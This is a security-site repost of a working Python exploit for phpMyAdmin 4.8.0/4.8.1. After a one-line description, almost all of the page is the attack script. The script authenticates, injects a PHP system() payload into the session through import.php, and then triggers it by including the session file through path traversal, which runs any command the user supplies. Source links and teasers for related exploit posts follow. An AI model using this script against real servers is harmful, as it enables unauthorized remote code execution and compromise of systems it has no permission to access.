www.1337.or.id
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
Ganesha 21 November 2022 35.278 ViewsSecurity Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution.
#!/usr/bin/env python
import re, requests, sys
# check python major version
if sys.version_info.major == 3:
import html
else:
from six.moves.html_parser import HTMLParser
html = HTMLParser()
if len(sys.argv) < 7:
usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
print(usage.format(sys.argv[0],sys.argv[0]))
exit()
def get_token(content):
s = re.search('token"\s*value="(.*?)"', content)
token = html.unescape(s.group(1))
return token
ipaddr = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
command = sys.argv[6]
url = "http://{}:{}{}".format(ipaddr,port,path)
# 1st req: check login page and version
url1 = url + "/index.php"
r = requests.get(url1)
content = r.content.decode('utf-8')
if r.status_code != 200:
print("Unable to find the version")
exit()
s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
version = s.group(1)
if version != "4.8.0" and version != "4.8.1":
print("The target is not exploitable".format(version))
exit()
# get 1st token and cookie
cookies = r.cookies
token = get_token(content)
# 2nd req: login
p = {'token': token, 'pma_username': username, 'pma_password': password}
r = requests.post(url1, cookies = cookies, data = p)
content = r.content.decode('utf-8')
s = re.search('logged_in:(\w+),', content)
logged_in = s.group(1)
if logged_in == "false":
print("Authentication failed")
exit()
# get 2nd token and cookie
cookies = r.cookies
token = get_token(content)
# 3rd req: execute query
url2 = url + "/import.php"
# payload
payload = '''select '<?php system("{}") ?>';'''.format(command)
p = {'table':'', 'token': token, 'sql_query': payload }
r = requests.post(url2, cookies = cookies, data = p)
if r.status_code != 200:
print("Query failed")
exit()
# 4th req: execute payload
session_id = cookies.get_dict()['phpMyAdmin']
url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
r = requests.get(url3, cookies = cookies)
if r.status_code != 200:
print("Exploit failed")
exit()
# get result
content = r.content.decode('utf-8', errors="replace")
s = re.search("select '(.*?)\n'", content, re.DOTALL)
if s != None:
print(s.group(1))
https://www.exploit-db.com/exploits/50457
https://vulners.com/zdt/1337DAY-ID-36949
https://www.vulnspy.com/phpmyadmin-4.8.1/
https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
Related Posts:
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
Ganesha
21 November 2022
29.544 Views
A remote code execution RCE vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users photo preview delete photo feature, allowing bypass of .htaccess protecti...
Critical 9.1 Severity Next.js Middleware Vulnerability Exposes Unauthorized Access Risk
Airlangga
25 March 2025
265 Views
A serious security vulnerability CVE 2025 29927 has been found in Next.js, which allows attackers to fully circumvent security controls that rely on middleware. This is achieved by manipulating the x middleware subrequest header, potentially exposing systems to unauthorized access and exploitation...
Dynamic Content for Elementor < 1.9.6 - Authenticated RCE
Airlangga
10 February 2023
19.766 Views
The PHP Raw Widget dynamic.ooo widget php raw of the Dynamic Content for Elementor plugin before 1.9.6 did not properly check for user permissions, allowing accounts with a role as low as editor to perform RCE attacks. Proof of Concept POST wp admin admin ajax.php HTTP 1.1 Host exam...